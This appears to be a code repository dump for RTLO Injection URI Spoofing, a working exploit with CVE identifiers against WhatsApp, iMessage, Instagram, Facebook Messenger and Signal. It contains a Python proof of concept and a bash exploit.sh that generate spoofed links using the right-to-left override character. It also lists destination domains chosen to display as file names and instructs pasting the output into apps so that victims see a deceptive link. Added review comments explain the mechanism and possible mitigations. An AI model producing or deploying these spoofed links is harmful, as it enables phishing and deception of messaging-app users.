├── imessage.mp4
├── instagram.gif
├── whatsapp.gif
├── messenger.jpeg
├── poc.py
├── LICENSE
└── exploit.sh

/imessage.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zadewg/RIUS/HEAD/imessage.mp4
--------------------------------------------------------------------------------

/instagram.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zadewg/RIUS/HEAD/instagram.gif
--------------------------------------------------------------------------------

/whatsapp.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zadewg/RIUS/HEAD/whatsapp.gif
--------------------------------------------------------------------------------

/messenger.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zadewg/RIUS/HEAD/messenger.jpeg
--------------------------------------------------------------------------------

/poc.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python2.7
# coding=utf-8

# RTLO Injection URI Spoofing
# https://github.com/zadewg/RIUS
# Copyright (C) zadewg at gmail dot com
# RIUS_back.py 2019 August 11th

# This POC uses a different approach than the one provided in exploit.sh

# Defensive context: the output of this script is ordinary text that contains
# U+202E (RIGHT-TO-LEFT OVERRIDE). A renderer that honours the override shows
# the characters after it in reverse visual order, so the text a reader sees
# differs from the stored character sequence. Message renderers and linkifiers
# can neutralise this by stripping or visibly escaping the bidi control
# characters (U+202A-U+202E, U+2066-U+2069) before detecting links, and by
# displaying the parsed host instead of the raw text. A U+202E inside or next
# to a URL in message content is a usable detection signal.

import sys

# NOTE(review): this name shadows the builtin help(). The usage text names no
# arguments although main() requires exactly two; the placeholders were
# presumably lost when the page was extracted - confirm against the repository.
help = "usage: python poc.py \nnote: this script might not work depending on your consoles character set"

def main():
    """Print a string built from U+202E and the two command-line arguments.

    argv[1] is handled as the URL that should be displayed and argv[2] as the
    other URL; the variable names _LEGWEB and _ATTWEB are the author's. Unless
    exactly two arguments are given, the usage text is printed and the script
    exits through SystemExit.
    """
    if len(sys.argv) != 3:
        print(help)
        raise SystemExit

    # U+202E, RIGHT-TO-LEFT OVERRIDE.
    _RTLO = (u'\u202e')

    # argv[1] reversed character by character; "https://" is prepended first
    # when that substring is absent. NOTE(review): `in` is a substring test,
    # not a prefix test, so the scheme is not added if "https://" occurs
    # anywhere in the argument.
    _LEGWEB = sys.argv[1][::-1] if "https://" in sys.argv[1] else str("https://" + sys.argv[1])[::-1]
    # Every occurrence of "https://" is removed from argv[2], not only a
    # leading one.
    _ATTWEB = sys.argv[2].replace('https://', '')

    # Stored (logical) order of the output: ' ', U+202E, _ATTWEB, '#/', then
    # the reversed argv[1] URL, which therefore sits in fragment position
    # after '#'. A renderer that honours the override displays this as the
    # argv[1] URL, then '/#', then _ATTWEB backwards.
    # Under python2.7 writing a unicode string to sys.stdout depends on the
    # console encoding, which is what the note in the usage text refers to.
    sys.stdout.write(' ' + _RTLO + (_ATTWEB + '#/' + _LEGWEB) + '\n')

if __name__ == '__main__':
    main()

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2019 zadewg

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/exploit.sh:
--------------------------------------------------------------------------------
# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version 2.19.80 and below
# Tested on: Whatsapp Android
# Version 2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096


# NOTE(review): the interpreter line below is line 30 of the file, so it is an
# ordinary comment; a shebang is only honoured on the first line.
#!/bin/bash
# Author: sickcodes
# Contact: https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright: sickcodes (C) 2022
# License: GPLv3+

# References: https://github.com/zadewg/RIUS
# https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
# https://sick.codes/sick-2022-40


# Each entry is printed after U+202E below, so a renderer that honours the
# override shows its characters reversed (4pm.asia displays as aisa.mp4).
# 4pm.tv appears twice in the list.
DESTINATIONS=(4pm.asia
4pm.tv
gepj.live
gepj.xyz
kpa.li
xcod.xyz
4pm.tv
gepj.net)

# Prefix that is printed before the override character, in normal order.
APPEAR_AS='https://legit.okay/files'

for DESTINATION in "${DESTINATIONS[@]}"; do

# Logical order of each printed line: APPEAR_AS, '/', U+202E, DESTINATION.
# How the listed apps split that text into links is not shown in this file.
# Stripping or escaping bidi control characters before link detection, and
# displaying the parsed host, removes the mismatch between the stored and the
# displayed text.
# NOTE(review): both variables are expanded inside the printf format string,
# so a '%' or backslash in either value would be interpreted by printf; the
# \u escape needs bash 4.2 or later.
printf "${APPEAR_AS}/\u202E${DESTINATION}\n"

done

# copy paste into any of the above apps.
# victim will see a surreptitious link


# works on latest Signal (unpatched)
# NOTE(review): "latest" refers to the header's date (24/03/2022) and Signal
# version (5.33.0.25 and below); the current status is not stated on this page.

--------------------------------------------------------------------------------